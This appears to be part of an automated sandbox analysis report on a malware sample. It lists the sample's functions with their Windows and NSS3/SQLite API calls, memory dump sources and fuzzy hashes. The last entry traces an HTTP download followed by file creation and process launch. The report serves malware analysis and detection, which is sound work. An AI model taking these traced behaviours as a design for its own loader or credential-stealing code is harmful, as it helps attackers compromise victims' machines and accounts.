                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB55F17,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACA6
                                                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACC0
                                                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6ACDB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                                                              • Opcode ID: 30b57fb51dfc69940db4a58053d6670804974c739edff60d121ba81ea16919c9
                                                                                                                                                                                                              • Instruction ID: 8d84e3a47391fe12262d329c7d69447407cc9858f459ccc3867c31e9f1ddf20f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b57fb51dfc69940db4a58053d6670804974c739edff60d121ba81ea16919c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC0148B1701B529BEB50DF2AD909757B7E8FF00A99B104839E85AD3E00E731F058CB92
                                                                                                                                                                                                              Function 6CAD1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CAD1DFB
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: TlsGetValue.KERNEL32(00000000,?,6CAE00D2,00000000), ref: 6CAC95D2
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAE00D2,00000000), ref: 6CAC95E7
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: PR_Unlock.NSS3(?,?,?,?,6CAE00D2,00000000), ref: 6CAC9605
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CAD1E09
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890AB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890C9
                                                                                                                                                                                                                • Part of subcall function 6CB89090: EnterCriticalSection.KERNEL32 ref: 6CB890E5
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB89116
                                                                                                                                                                                                                • Part of subcall function 6CB89090: LeaveCriticalSection.KERNEL32 ref: 6CB8913F
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_EnterMonitor.NSS3(?,?,6CACE175), ref: 6CACE19C
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_EnterMonitor.NSS3(6CACE175), ref: 6CACE1AA
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_ExitMonitor.NSS3 ref: 6CACE208
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PL_HashTableRemove.NSS3(?), ref: 6CACE219
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CACE231
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CACE249
                                                                                                                                                                                                                • Part of subcall function 6CACE190: PR_ExitMonitor.NSS3 ref: 6CACE257
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD1E37
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CAD1E4A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 499896158-0
                                                                                                                                                                                                              • Opcode ID: a9daea55523b0f613d82c021cb21e90235feef73c1ae47c189c5bc4290f7a1e0
                                                                                                                                                                                                              • Instruction ID: 49be3020822805e483caf4e7a4a0d5b592f884ea14e86dbffdc3eb35145e218d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9daea55523b0f613d82c021cb21e90235feef73c1ae47c189c5bc4290f7a1e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D012B71B0119297EF008B65DC00F767774AB4176CF1A0031DA1997B51EB35F898CBD6
                                                                                                                                                                                                              Function 6CAD1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD1D75
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAD1D89
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000010), ref: 6CAD1D9C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD1DB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 939066016-0
                                                                                                                                                                                                              • Opcode ID: bbbc67ff9717a62c6a483aaeb9676af2d0c4760040aa5bfc89c94198b5cd025b
                                                                                                                                                                                                              • Instruction ID: c052132ab5958c83e0c18f3bb2bbb761759d262fdeb95e993f75e71bc7d36bcd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbbc67ff9717a62c6a483aaeb9676af2d0c4760040aa5bfc89c94198b5cd025b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F0F9B2A4125157FF101F9AAC42BA73658EF817A8F160235DF9D47F41D760F484C6E2
                                                                                                                                                                                                              Function 6CB6AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC2D
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE10
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: EnterCriticalSection.KERNEL32(?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE24
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CAED079,00000000,00000001), ref: 6CB0AE5A
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE6F
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE7F
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEB1
                                                                                                                                                                                                                • Part of subcall function 6CB0ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEC9
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC44
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB55D40,00000000,?,?,6CB46AC6,6CB5639C), ref: 6CB6AC59
                                                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6CB46AC6,6CB5639C,?,?,?,?,?,?,?,?,?,6CB55D40,00000000,?,6CB5AAD4), ref: 6CB6AC62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1595327144-0
                                                                                                                                                                                                              • Opcode ID: 0e6174ba3a1a170ea705a6e1a1599e3cdb7f1d561c8f7990ea413d14f2f488ce
                                                                                                                                                                                                              • Instruction ID: cdcc2ca92713f052200e30bf581081098cb7dfba3965e6581557bdab46802567
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e6174ba3a1a170ea705a6e1a1599e3cdb7f1d561c8f7990ea413d14f2f488ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F012CB56002509BDF00DF15ECC0B46BBA8EB44B5CF188468E9498FB06D735E844CFA2
                                                                                                                                                                                                              Function 6CB1FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CAC9003,?), ref: 6CB1FD91
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(A4686CB2,?), ref: 6CB1FDA2
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB2,?,?), ref: 6CB1FDC4
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?), ref: 6CB1FDD1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2335489644-0
                                                                                                                                                                                                              • Opcode ID: 3f2bc5134d0926ac5beebad13f065a5d53ab6159b6dc3e5e91825d6768d3d3b2
                                                                                                                                                                                                              • Instruction ID: 81330cd170f819685179e48d1287633f4ebed61482a25343a2c2e36308b97f8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f2bc5134d0926ac5beebad13f065a5d53ab6159b6dc3e5e91825d6768d3d3b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF0C8B16152925BEB004B55EC9193BB768EF54299B148034ED0DCAF41E721D815C7E3
                                                                                                                                                                                                              Function 00930C95 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,009565B6,?,?,?), ref: 00930CAD
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00930CB4
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00930CC0
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                                                                                              • Opcode ID: 451ca3a2679fa102dfd241cca3ad124cfeaf32971ec5af19647589133c737f8a
                                                                                                                                                                                                              • Instruction ID: 8762569e5827fd5c519cef43ead8181353443ffcad0d23d2a24c21888f806533
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 451ca3a2679fa102dfd241cca3ad124cfeaf32971ec5af19647589133c737f8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF031B1900218BBDB10ABE59C05ABF77FCAF0C715F400085F955E7180DA38DA80D775
                                                                                                                                                                                                              Function 0093213B Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00934FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00934FEC,?), ref: 00932156
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00934FEC,?,?,?,00934FEC,?), ref: 0093216E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934FEC,?), ref: 00932179
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934FEC,?), ref: 00932181
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4148174661-0
                                                                                                                                                                                                              • Opcode ID: 2964bd65761524b55ca10631322483627337099a10e029b802f1ef439bc512f5
                                                                                                                                                                                                              • Instruction ID: b4db8d0aba3573cb2c5b9a51b426aea85f1c7012eead91391f0381dbb8434519
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2964bd65761524b55ca10631322483627337099a10e029b802f1ef439bc512f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF01231605215BBE7149BA0DD49FDA7A6CDF09760F104250FE15AA1D0DB70AE818A95
                                                                                                                                                                                                              Function 6CBDCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                                                                                              • Opcode ID: c392e237adc19b5928328e4846047655549fb5d6b1cd5d94341316af68608780
                                                                                                                                                                                                              • Instruction ID: f6840f5ac102d949721e16b17249b3131859775b626908673ce2c93a58f36ef6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c392e237adc19b5928328e4846047655549fb5d6b1cd5d94341316af68608780
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E030767006089BCA10EFA9DC8588677BCFE492703150525F691C3700D231F915CBA1
                                                                                                                                                                                                              Function 6CAB9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_value_text.NSS3 ref: 6CAB9E1F
                                                                                                                                                                                                                • Part of subcall function 6CA713C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA42352,?,00000000,?,?), ref: 6CA71413
                                                                                                                                                                                                                • Part of subcall function 6CA713C0: memcpy.VCRUNTIME140(00000000,6CA42352,00000002,?,?,?,?,6CA42352,?,00000000,?,?), ref: 6CA714C0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • LIKE or GLOB pattern too complex, xrefs: 6CABA006
                                                                                                                                                                                                              • ESCAPE expression must be a single character, xrefs: 6CAB9F78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                              • API String ID: 2453365862-264706735
                                                                                                                                                                                                              • Opcode ID: cd5852114157514f83a0a278b815f8d3b387c0c39f74943021d7446abd72e11a
                                                                                                                                                                                                              • Instruction ID: dde3673dd2d8e80272cec7ae67a09fcfcb3006e15f2d4779000090e38332fcba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd5852114157514f83a0a278b815f8d3b387c0c39f74943021d7446abd72e11a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29813D30A043514BD700CF39C2903ADB7F6AF55328F2C8659D8A9ABB81D732D8C6C790
                                                                                                                                                                                                              Function 00932C30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00925237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092527E
                                                                                                                                                                                                                • Part of subcall function 00925237: RtlAllocateHeap.NTDLL(00000000), ref: 00925285
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 009252A7
                                                                                                                                                                                                                • Part of subcall function 00925237: StrCmpCA.SHLWAPI(?), ref: 009252C1
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009252F1
                                                                                                                                                                                                                • Part of subcall function 00925237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00925330
                                                                                                                                                                                                                • Part of subcall function 00925237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925360
                                                                                                                                                                                                                • Part of subcall function 00925237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0092536B
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00932D1F
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00956718), ref: 00932D71
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
